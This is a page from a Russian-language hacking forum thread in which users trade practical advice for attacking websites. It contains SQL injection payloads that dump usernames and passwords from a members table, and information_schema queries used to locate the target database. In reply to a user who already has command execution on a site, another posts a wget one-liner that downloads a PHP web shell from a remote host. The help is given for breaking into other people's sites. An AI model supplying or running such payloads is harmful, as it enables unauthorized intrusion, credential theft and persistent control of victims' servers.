HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1760 из 2438 « Первая < 7601260166017101750 1756 1757 1758 1759 1760 1761 1762 1763 1764 1770181018602260 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #17591  
Старый 15.07.2011, 18:54
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию
Цитата:
Сообщение от [Gold  
Shell"]
[Gold]Shell said:
Не хватает прав для выполнения запроса.
лол что?

1. выполняй "union select database()";

2. потом "union select concat_ws(0x3a,username,password) from REZULTAT_PERVOGO_ZAPROSA.members limit 0,1";

3. Profit!
 
Ответить с цитированием

  #17592  
Старый 15.07.2011, 19:14
mega_667
Новичок
Регистрация: 03.07.2011
Сообщений: 16
Провел на форуме:
3667

Репутация: 0
По умолчанию
Цитата:
Сообщение от Фараон  
лол что?
1. выполняй "union select database()";
2. потом "union select concat_ws(0x3a,username,password) from REZULTAT_PERVOGO_ZAPROSA.members limit 0,1";
3. Profit!
database() - результат DB.

Результат одинков .... " Table 'DB.members' doesn't exist " ..

и когда просто members и DB.members .....
 
Ответить с цитированием

  #17593  
Старый 15.07.2011, 19:19
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию
Цитата:
Сообщение от mega_667  
database() - результат DB.
Результат одинков .... " Table 'DB.members' doesn't exist " ..
и когда просто members и DB.members .....
ни, давай ссылягу
 
Ответить с цитированием

  #17594  
Старый 15.07.2011, 19:22
mega_667
Новичок
Регистрация: 03.07.2011
Сообщений: 16
Провел на форуме:
3667

Репутация: 0
По умолчанию
Цитата:
Сообщение от Фараон  
ни, давай ссылягу
Всё ребят спасибо .... разобрался с помощью SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA нашёл список баз .... последняя покатила .....
 
Ответить с цитированием

  #17595  
Старый 15.07.2011, 19:23
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию
Цитата:
Сообщение от mega_667  
Всё ребят спасибо .... разобрался с помощью SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA нашёл список баз .... последняя покатила .....
можно было проще:

SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA where table_name='members'
 
Ответить с цитированием

  #17596  
Старый 15.07.2011, 19:47
freezed
Участник форума
Регистрация: 27.08.2010
Сообщений: 154
Провел на форуме:
31258

Репутация: 7
По умолчанию
Цитата:
Сообщение от Фараон  
можно было проще:
SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA where table_name='members'
с каких пор в таблице schemata содержатся названия таблиц?

Код:
select table_schema form information_schema.tables where table_name='name'
 
Ответить с цитированием

  #17597  
Старый 15.07.2011, 23:37
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401

Репутация: 0
По умолчанию
Цитата:
Сообщение от mailbrush  
Узнаешь в какой базе находится таблица.
это был тонкий намёк на твою ошибку. смотри внимательнее.
 
Ответить с цитированием

  #17598  
Старый 16.07.2011, 13:46
Ups
Участник форума
Регистрация: 11.04.2011
Сообщений: 113
Провел на форуме:
42754

Репутация: 0
По умолчанию
Есть скрипт например:

site.ru/trololo/a.php

Могу выполнять команды через него. Например:

site.ru/trololo/a.php?cmd=ls -la

Выводит лист этой диры.

Так вот. Как залить шелл в диру корневую?

Прав на заливку файла в папку /trololo/ нету.
 
Ответить с цитированием

  #17599  
Старый 16.07.2011, 14:21
Expl0ited
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
Провел на форуме:
262707

Репутация: 935


По умолчанию
Цитата:
Сообщение от Ups  
Есть скрипт например:
site.ru/trololo/a.php
Могу выполнять команды через него. Например:
site.ru/trololo/a.php?cmd=ls -la
Выводит лист этой диры.
Так вот. Как залить шелл в диру корневую?
Прав на заливку файла в папку /trololo/ нету.
Код:
cd ..;wget -O shell.php http://remote/shell.txt;ls -la
 
Ответить с цитированием

  #17600  
Старый 16.07.2011, 18:01
maxfax
Новичок
Регистрация: 23.06.2010
Сообщений: 25
Провел на форуме:
8037

Репутация: 0
По умолчанию
Здравствуйте, меня вот интересует такой вопрос, вот к примеру вы нашли sql инъекцию подобрали количество колонок - одним словом можете выполнять произвольные запросы, а что вы дальше делаете залить shell через sql инъекцию это наверное 0.5% из 100 так как не будет прав на это, ну украдете хеш админа и будете клянчить на форуме "расшифруйте пожалуйста мне хеш" или брутить будете его пол года, это все что можно выжать их sql инъекции ?
 
Ответить с цитированием
Ответ
Страница 1760 из 2438 « Первая < 7601260166017101750 1756 1757 1758 1759 1760 1761 1762 1763 1764 1770181018602260 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.